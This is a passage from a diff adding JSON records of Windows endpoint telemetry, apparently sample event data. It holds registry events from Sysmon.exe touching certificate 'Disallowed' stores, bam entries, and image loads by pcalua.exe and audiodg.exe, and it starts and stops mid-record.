"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": "SequenceNumber", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "audiodg.exe", + "image_path": "C:\\Windows\\System32\\audiodg.exe", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "devobj.dll", + "image_path": "C:\\Windows\\System32\\devobj.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "MMDevAPI.dll", + "image_path": "C:\\Windows\\System32\\MMDevAPI.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 